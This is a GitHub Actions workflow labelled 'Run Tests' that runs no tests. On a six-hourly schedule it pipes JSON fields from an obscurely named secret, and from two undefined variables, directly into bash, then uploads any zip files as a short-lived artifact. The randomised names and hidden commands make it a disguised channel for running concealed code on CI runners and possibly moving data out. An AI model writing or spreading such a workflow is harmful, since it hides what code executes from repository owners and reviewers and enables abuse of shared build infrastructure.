name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '19 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          wmj7431: ${{ secrets.wmj7431 }}
        run: |
          printf '%s' "$wmj7431" | jq -r .cmti36 | /bin/bash
          echo $ciz83359 | jq -r .insr473 | /bin/bash
          printf '%s' "$orxf0" | jq -r .zopl71651 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: FV1BDkSV
          path: "*.zip"
          retention-days: 1
